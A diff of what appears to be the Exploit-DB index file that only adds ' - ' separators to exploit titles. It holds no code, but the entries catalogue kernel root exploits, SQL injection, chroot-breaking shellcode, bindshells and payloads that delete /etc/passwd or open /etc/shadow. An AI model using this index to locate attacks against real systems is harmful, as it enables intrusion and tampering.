Vulns",2009-03-23,Benkei,hardware,dos,0 -8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 (ktimer) Local Kernel Root Exploit",2009-03-23,mu-b,freebsd,local,0 -8262,platforms/osx/dos/8262.c,"Mac OS X xnu <= 1228.3.13 (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 -8263,platforms/osx/dos/8263.c,"Mac OS X xnu <= 1228.3.13 (macfsstat) Local Kernel Memory Leak/DoS",2009-03-23,mu-b,osx,dos,0 -8264,platforms/osx/dos/8264.c,"Mac OS X xnu <= 1228.3.13 (profil) Kernel Memory Leak/DoS PoC",2009-03-23,mu-b,osx,dos,0 +8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - (ktimer) Local Kernel Root Exploit",2009-03-23,mu-b,freebsd,local,0 +8262,platforms/osx/dos/8262.c,"Mac OS X xnu <= 1228.3.13 - (zip-notify) Remote Kernel Overflow PoC",2009-03-23,mu-b,osx,dos,0 +8263,platforms/osx/dos/8263.c,"Mac OS X xnu <= 1228.3.13 - (macfsstat) Local Kernel Memory Leak/DoS",2009-03-23,mu-b,osx,dos,0 +8264,platforms/osx/dos/8264.c,"Mac OS X xnu <= 1228.3.13 - (profil) Kernel Memory Leak/DoS PoC",2009-03-23,mu-b,osx,dos,0 8265,platforms/osx/dos/8265.c,"Mac OS X xnu <= 1228.x - (vfssysctl) Local Kernel DoS PoC",2009-03-23,mu-b,osx,dos,0 -8266,platforms/osx/local/8266.txt,"Mac OS X xnu <= 1228.x (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 +8266,platforms/osx/local/8266.txt,"Mac OS X xnu <= 1228.x - (hfs-fcntl) Local Kernel Root Exploit",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - (.pls) Universal Seh Overwrite Exploit",2009-03-23,His0k4,windows,local,0 8268,platforms/php/webapps/8268.php,"PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution Exploit",2009-03-23,YOUCODE,php,webapps,0 8269,platforms/hardware/remote/8269.txt,"Rittal CMC-TC Processing Unit II - Multiple Vulnerabilities",2009-03-23,"Louhi Networks",hardware,remote,0 @@ -8102,8 +8102,8 @@ id,file,description,date,author,platform,type,port 8594,platforms/windows/local/8594.pl,"RM Downloader - (.smi) Universal Local Buffer Overflow Exploit",2009-05-01,Stack,windows,local,0 8595,platforms/windows/local/8595.txt,"Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon() Memory Corruption Exploit",2009-05-04,Abysssec,windows,local,0 8596,platforms/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b Remote Database Disclosure Exploit",2009-05-04,ZoRLu,asp,webapps,0 -8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 -8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 +8597,platforms/solaris/dos/8597.c,"Solaris 10 / OpenSolaris - (dtrace) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 +8598,platforms/solaris/dos/8598.c,"Solaris 10 / OpenSolaris - (fasttrap) Local Kernel Denial of Service PoC",2009-05-04,mu-b,solaris,dos,0 8599,platforms/php/webapps/8599.txt,"AGTC MyShop 3.2 Insecure Cookie Handling Vulnerability",2009-05-04,Mr.tro0oqy,php,webapps,0 8600,platforms/php/webapps/8600.txt,"BluSky CMS (news_id) Remote SQL Injection Vulnerability",2009-05-04,snakespc,php,webapps,0 8601,platforms/windows/dos/8601.txt,"EW-MusicPlayer 0.8 - (.m3u) Local Buffer Overflow PoC",2009-05-04,SirGod,windows,dos,0 @@ -8473,7 +8473,7 @@ id,file,description,date,author,platform,type,port 8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"phportal 1.0 Insecure Cookie Handling Vulnerability",2009-06-17,KnocKout,php,webapps,0 8982,platforms/linux/dos/8982.txt,"compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC",2009-06-17,metalhoney,linux,dos,0 -8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 +8983,platforms/windows/local/8983.c,"DESlock+ 4.0.2 - dlpcrypt.sys Local Kernel ring0 Code Execution Exploit",2009-06-18,mu-b,windows,local,0 8984,platforms/php/webapps/8984.txt,"cms buzz (xss/pc/hi) Multiple Vulnerabilities",2009-06-18,"ThE g0bL!N",php,webapps,0 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method Vuln",2009-06-18,Jambalaya,windows,remote,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-06-22,HxH,cgi,webapps,0 @@ -8846,7 +8846,7 @@ id,file,description,date,author,platform,type,port 9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 (bSQL-XSS) Multiple Vulns",2009-08-05,Moudi,php,webapps,0 9371,platforms/php/webapps/9371.txt,"opennews 1.0 (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection Vulnerability",2009-08-05,"Chip d3 bi0s",php,webapps,0 -9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 +9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0 @@ -9442,7 +9442,7 @@ id,file,description,date,author,platform,type,port 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 -10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local kernel Root Exploit",2009-10-02,mu-b,osx,local,0 +10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 - vmx86 kext Local kernel Root Exploit",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2009-11-09,"Ralf Haferkamp",multiple,dos,389 10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 @@ -9506,7 +9506,7 @@ id,file,description,date,author,platform,type,port 10190,platforms/windows/dos/10190.txt,"Cisco VPN Client Integer Overflow (DOS)",2009-11-21,"Alex Hernandez",windows,dos,0 10192,platforms/php/webapps/10192.txt,"Joomla Component Com_Joomclip (cat) SQL injection",2009-11-21,"599eme Man",php,webapps,0 10201,platforms/windows/local/10201.pl,"TEKUVA Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 -10202,platforms/linux/dos/10202.txt,"Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service",2009-10-15,"Simon Vallet",linux,dos,0 +10202,platforms/linux/dos/10202.txt,"Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service",2009-10-15,"Simon Vallet",linux,dos,0 10203,platforms/linux/dos/10203.txt,"BibTeX - (.bib) File Handling Memory Corruption Vulnerability",2009-11-13,"Vincent Lafevre",linux,dos,0 10204,platforms/windows/dos/10204.txt,"Foxit Reader - COM Objects Memory Corruption Remote Code Execution Vulnerability",2009-11-19,mrx,windows,dos,0 10205,platforms/multiple/dos/10205.txt,"LibTIFF - 'LZWDecodeCompat()' Remote Buffer Underflow Vulnerability",2009-11-12,wololo,multiple,dos,0 @@ -10305,7 +10305,7 @@ id,file,description,date,author,platform,type,port 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - (.mp3) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - (.mp3 /.pls) Local Crash PoC",2010-01-22,"cr4wl3r ",windows,dos,0 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin User)",2010-01-22,Stack,windows,local,0 -11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 shdrv.sys Local kernel ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 +11232,platforms/windows/local/11232.c,"Authentium SafeCentral <= 2.6 - shdrv.sys Local kernel ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote DoS/Crash Exploit",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash PoC",2010-01-23,b0telh0,windows,dos,0 11235,platforms/php/webapps/11235.txt,"magic-portal 2.1 - SQL Injection Vulnerability",2010-01-23,alnjm33,php,webapps,0 @@ -11267,8 +11267,8 @@ id,file,description,date,author,platform,type,port 12332,platforms/windows/remote/12332.pl,"Xftp client 3.0 PWD Remote Exploit",2010-04-22,zombiefx,windows,remote,0 12333,platforms/php/webapps/12333.txt,"cms - (id) 5.0 - SQL Injection Vulnerability",2010-04-22,spykit,php,webapps,0 12334,platforms/linux/dos/12334.c,"OpenSSL - Remote DoS",2010-04-22,Andi,linux,dos,0 -12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 Win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 -12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 Win32k.sys SfnINSTRING Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 +12336,platforms/windows/dos/12336.c,"Windows 2000/XP/2003 - Win32k.sys SfnLOGONNOTIFY Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 +12337,platforms/windows/dos/12337.c,"Windows 2000/XP/2003 - Win32k.sys SfnINSTRING Local kernel Denial of Service Vulnerability",2010-04-22,MJ0011,windows,dos,0 12338,platforms/php/webapps/12338.txt,"Cacti <= 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti <= 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12340,platforms/php/webapps/12340.txt,"Joomla Component com_caddy - Vulnerability",2010-04-22,_SuBz3r0_,php,webapps,0 @@ -11894,7 +11894,7 @@ id,file,description,date,author,platform,type,port 13412,platforms/lin_x86/shellcode/13412.c,"linux/x86 /bin/sh sysenter Opcode Array Payload 23 Bytes",2005-09-04,BaCkSpAcE,lin_x86,shellcode,0 13413,platforms/lin_x86/shellcode/13413.c,"linux/x86 /bin/sh sysenter Opcode Array Payload 27 Bytes",2005-08-25,amnesia,lin_x86,shellcode,0 13414,platforms/lin_x86/shellcode/13414.c,"linux/x86 /bin/sh sysenter Opcode Array Payload 45 bytes",2005-08-19,c0ntex,lin_x86,shellcode,0 -13415,platforms/lin_x86/shellcode/13415.c,"linux/x86 chroot & standart 66 bytes",2005-07-11,Okti,lin_x86,shellcode,0 +13415,platforms/lin_x86/shellcode/13415.c,"linux/x86 - chroot & standart 66 bytes",2005-07-11,Okti,lin_x86,shellcode,0 13416,platforms/lin_x86/shellcode/13416.txt,"linux/x86 upload & exec 189 bytes",2005-06-19,cybertronic,lin_x86,shellcode,0 13417,platforms/lin_x86/shellcode/13417.c,"linux/x86 setreuid/execve 31 bytes",2004-12-26,oc192,lin_x86,shellcode,0 13418,platforms/lin_x86/shellcode/13418.c,"linux/x86 alpha-numeric shellcode 64 bytes",2004-12-22,xort,lin_x86,shellcode,0 @@ -11931,17 +11931,17 @@ id,file,description,date,author,platform,type,port 13449,platforms/lin_x86/shellcode/13449.c,"linux/x86 portbind port 5074 + fork() 130 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13450,platforms/lin_x86/shellcode/13450.c,"linux/x86 add user t00r 82 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13451,platforms/lin_x86/shellcode/13451.c,"linux/x86 add user 104 bytes",2004-09-12,"Matt Conover",lin_x86,shellcode,0 -13452,platforms/lin_x86/shellcode/13452.c,"linux/x86 break chroot 34 bytes",2004-09-12,dev0id,lin_x86,shellcode,0 -13453,platforms/lin_x86/shellcode/13453.c,"linux/x86 break chroot 46 bytes",2004-09-12,dev0id,lin_x86,shellcode,0 -13454,platforms/lin_x86/shellcode/13454.c,"linux/x86 break chroot execve /bin/sh 80 bytes",2004-09-12,preedator,lin_x86,shellcode,0 +13452,platforms/lin_x86/shellcode/13452.c,"linux/x86 - break chroot 34 bytes",2004-09-12,dev0id,lin_x86,shellcode,0 +13453,platforms/lin_x86/shellcode/13453.c,"linux/x86 - break chroot 46 bytes",2004-09-12,dev0id,lin_x86,shellcode,0 +13454,platforms/lin_x86/shellcode/13454.c,"linux/x86 - break chroot execve /bin/sh 80 bytes",2004-09-12,preedator,lin_x86,shellcode,0 13455,platforms/lin_x86/shellcode/13455.c,"linux/x86 execve /bin/sh encrypted 58 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13456,platforms/lin_x86/shellcode/13456.c,"linux/x86 execve /bin/sh xor encrypted 55 bytes",2004-09-12,N/A,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"linux/x86 execve /bin/sh tolower() evasion 41 bytes",2004-09-12,N/A,lin_x86,shellcode,0 13458,platforms/lin_x86/shellcode/13458.c,"execve of /bin/sh after setreuid(0_0)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 -13459,platforms/lin_x86/shellcode/13459.c,"linux chroot()/execve() code",2001-01-13,preedator,lin_x86,shellcode,0 +13459,platforms/lin_x86/shellcode/13459.c,"linux - chroot()/execve() code",2001-01-13,preedator,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"linux/x86 execve /bin/sh toupper() evasion 55 bytes",2000-08-08,N/A,lin_x86,shellcode,0 13461,platforms/lin_x86/shellcode/13461.c,"linux/x86 add user 70 bytes",2000-08-07,N/A,lin_x86,shellcode,0 -13462,platforms/lin_x86/shellcode/13462.c,"linux/x86 break chroot setuid(0) + /bin/sh 132 bytes",2000-08-07,N/A,lin_x86,shellcode,0 +13462,platforms/lin_x86/shellcode/13462.c,"linux/x86 - break chroot setuid(0) + /bin/sh 132 bytes",2000-08-07,N/A,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"linux/x86-64 bindshell port:4444 shellcode 132 bytes",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"linux/x86-64 execve(/bin/sh) 33 bytes",2006-11-02,hophet,lin_x86-64,shellcode,0 13465,platforms/multiple/shellcode/13465.c,"linux/PPC/x86 execve(_/bin/sh__{_/bin/sh__NULL}_NULL) (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 @@ -12031,7 +12031,7 @@ id,file,description,date,author,platform,type,port 13572,platforms/linux/shellcode/13572.c,"linux/x86 unlink(/etc/passwd) & exit() 35 bytes",2009-12-24,sandman,linux,shellcode,0 13574,platforms/win32/shellcode/13574.c,"win32/xp sp2 (En + Ar) cmd.exe 23 bytes",2009-12-28,"AnTi SeCuRe",win32,shellcode,0 13576,platforms/lin_x86/shellcode/13576.asm,"linux/x86 chmod 666 /etc/shadow 27 bytes",2010-01-16,root@thegibson,lin_x86,shellcode,0 -13577,platforms/lin_x86/shellcode/13577.txt,"linux/x86 break chroot 79 bytes",2009-12-30,root@thegibson,lin_x86,shellcode,0 +13577,platforms/lin_x86/shellcode/13577.txt,"linux/x86 - break chroot 79 bytes",2009-12-30,root@thegibson,lin_x86,shellcode,0 13578,platforms/lin_x86/shellcode/13578.txt,"linux/x86 fork bomb 6 bytes",2009-12-30,root@thegibson,lin_x86,shellcode,0 13579,platforms/lin_x86/shellcode/13579.c,"linux/x86 append _/etc/passwd_ & exit() 107 bytes",2009-12-31,sandman,lin_x86,shellcode,0 13581,platforms/windows/shellcode/13581.txt,"Windows XP Pro Sp2 English _Message-Box_ Shellcode",2010-01-03,Aodrulez,windows,shellcode,0 @@ -12338,8 +12338,8 @@ id,file,description,date,author,platform,type,port 13999,platforms/php/webapps/13999.html,"Software Index (Remote File Upload) Exploit",2010-06-23,indoushka,php,webapps,0 14000,platforms/php/webapps/14000.txt,"PishBini Footbal XSS and SQL Injection Vulnerability",2010-06-23,indoushka,php,webapps,0 14001,platforms/multiple/webapps/14001.txt,"InterScan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 -14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 -14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 +14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 +14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2daybiz MLM Script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 @@ -13046,7 +13046,7 @@ id,file,description,date,author,platform,type,port 14943,platforms/asp/webapps/14943.txt,"sirang web-based d-control Multiple Vulnerabilities",2010-09-08,Abysssec,asp,webapps,0 14941,platforms/win32/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit",2010-09-07,"Lincoln, Nullthreat, rick2600",win32,remote,80 14944,platforms/windows/local/14944.py,"Microsoft Office Visio - .DXF File Stack based Overflow",2010-09-08,Abysssec,windows,local,0 -14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 +14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0 14949,platforms/windows/dos/14949.py,"Mozilla Firefox - XSLT Sort Remote Code Execution Vulnerability",2010-09-09,Abysssec,windows,dos,0 14952,platforms/php/webapps/14952.txt,"Visitors Google Map Lite 1.0.1 (FREE) module mod_visitorsgooglemap SQL Injection",2010-09-09,"Chip d3 bi0s",php,webapps,0 14954,platforms/asp/webapps/14954.txt,"aradblog - Multiple Vulnerabilities",2010-09-09,Abysssec,asp,webapps,0 @@ -13072,7 +13072,7 @@ id,file,description,date,author,platform,type,port 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - _pushstring_ Memory Corruption",2010-09-12,Abysssec,windows,local,0 14985,platforms/php/webapps/14985.txt,"System Shop (Module aktka) SQL Injection Vulnerability",2010-09-12,secret,php,webapps,0 14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability",2010-09-12,CoBRa_21,php,webapps,0 -14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 +14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 - Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 14988,platforms/php/webapps/14988.txt,"Group Office 3.5.9 - SQL Injection Vulnerability",2010-09-13,ViciOuS,php,webapps,0 14989,platforms/php/webapps/14989.txt,"osDate (uploadvideos.php) Shell Upload Vulnerability",2010-09-13,Xa7m3d,php,webapps,0 14990,platforms/windows/dos/14990.txt,"AA SMTP Server 1.1 - Crash PoC",2010-09-13,SONIC,windows,dos,0 @@ -13471,7 +13471,7 @@ id,file,description,date,author,platform,type,port 15476,platforms/multiple/dos/15476.php,"IBM OmniFind Crawler Denial of Service Vulnerability",2010-11-09,"Fatih Kilic",multiple,dos,0 15490,platforms/php/webapps/15490.txt,"XT:Commerce < 3.04 SP2.1 - XSS Vulnerability",2010-11-11,"Philipp Niedziela",php,webapps,0 15480,platforms/windows/local/15480.pl,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit",2010-11-10,"C4SS!0 G0M3S",windows,local,0 -15481,platforms/linux/dos/15481.c,"Linux Kernel Stack Infoleaks Vulnerability",2010-11-10,"Dan Rosenberg",linux,dos,0 +15481,platforms/linux/dos/15481.c,"Linux Kernel - Stack Infoleaks Vulnerability",2010-11-10,"Dan Rosenberg",linux,dos,0 15482,platforms/windows/dos/15482.html,"Qtweb Browser 3.5 - Buffer Overflow Vulnerability",2010-11-10,PoisonCode,windows,dos,0 15483,platforms/windows/local/15483.rb,"Free CD to MP3 Converter 3.1 - Buffer Overflow Exploit (SEH)",2010-11-10,"C4SS!0 G0M3S",windows,local,0 15486,platforms/php/webapps/15486.txt,"eBlog 1.7 - Multiple SQL Injection Vulnerabilities",2010-11-10,"Salvatore Fresta",php,webapps,0 @@ -13556,7 +13556,7 @@ id,file,description,date,author,platform,type,port 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - add root user with password - 151 bytes",2010-11-25,"Jonathan Salwan",arm,shellcode,0 15617,platforms/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,multiple,remote,0 15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 - 51 bytes",2010-11-25,"Dustin Schultz",osx,shellcode,0 -15619,platforms/linux/dos/15619.c,"Linux Kernel 'setup_arg_pages()' Denial of Service Vulnerability",2010-11-26,"Roland McGrath",linux,dos,0 +15619,platforms/linux/dos/15619.c,"Linux Kernel - 'setup_arg_pages()' Denial of Service Vulnerability",2010-11-26,"Roland McGrath",linux,dos,0 15620,platforms/linux/local/15620.sh,"systemtap - Local Root Privilege Escalation Vulnerability",2010-11-26,"Tavis Ormandy",linux,local,0 15621,platforms/php/webapps/15621.txt,"Jurpopage 0.2.0 - SQL Injection",2010-11-27,Sudden_death,php,webapps,0 15622,platforms/linux/dos/15622.c,"Linux Kernel - Unix Sockets Local Denial of Service",2010-11-27,"Key Night",linux,dos,0 @@ -13643,7 +13643,7 @@ id,file,description,date,author,platform,type,port 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 - Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 -15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) Local Root",2010-12-15,"Kryptos Logic",linux,local,0 +15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Local Root",2010-12-15,"Kryptos Logic",linux,local,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 - CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - LFI Exploit",2010-12-09,Br0ly,php,webapps,0 15712,platforms/arm/shellcode/15712.rb,"Create a New User with UID 0 - ARM (Metasploit)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 @@ -13970,7 +13970,7 @@ id,file,description,date,author,platform,type,port 16135,platforms/php/webapps/16135.html,"dotProject 2.1.5 - CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 16136,platforms/php/webapps/16136.html,"AIOCP 1.4.001 - CSRF Vulnerability",2011-02-08,"AutoSec Tools",php,webapps,0 16137,platforms/multiple/remote/16137.c,"Multiple Vendor Calendar Manager Remote Code Execution",2011-02-09,"Rodrigo Rubira Branco",multiple,remote,0 -16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 vdlptokn.sys Local Kernel ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 +16138,platforms/windows/local/16138.c,"DESlock+ <= 4.1.10 - vdlptokn.sys Local Kernel ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0 16139,platforms/php/webapps/16139.txt,"Auto Database System 1.0 Infusion Addon SQL Injection Vulnerability",2011-02-09,Saif,php,webapps,0 16140,platforms/php/webapps/16140.txt,"Web 2.0 Social Network Freunde Community SQL Injection Vunerability",2011-02-09,NoNameMT,php,webapps,0 16141,platforms/windows/local/16141.py,"xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 @@ -14751,7 +14751,7 @@ id,file,description,date,author,platform,type,port 16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,"Khashayar Fereidani",php,webapps,0 16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 - Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 -16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0 +16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection Vulnerability",2011-03-10,"Arturo Zamora",php,webapps,0 16955,platforms/asp/webapps/16955.txt,"smartermail 7.3 & 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 @@ -14879,7 +14879,7 @@ id,file,description,date,author,platform,type,port 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 -17097,platforms/bsd/dos/17097.c,"IPComp encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 +17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - XSS Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - CSRF Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17100,platforms/php/webapps/17100.txt,"spidaNews 1.0 news.php (id) SQL Injection Vulnerability news.php (id)",2011-04-02,"Easy Laster",php,webapps,0 @@ -15435,7 +15435,7 @@ id,file,description,date,author,platform,type,port 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin <= 1.0.8 - SQL Injection Vulnerability",2011-09-01,"Miroslav Stampar",php,webapps,0 17770,platforms/windows/local/17770.rb,"DVD X Player 5.5 - (.plf) PlayList Buffer Overflow",2011-09-01,metasploit,windows,local,0 -17769,platforms/linux/dos/17769.c,"Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 +17769,platforms/linux/dos/17769.c,"Linux Kernel - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 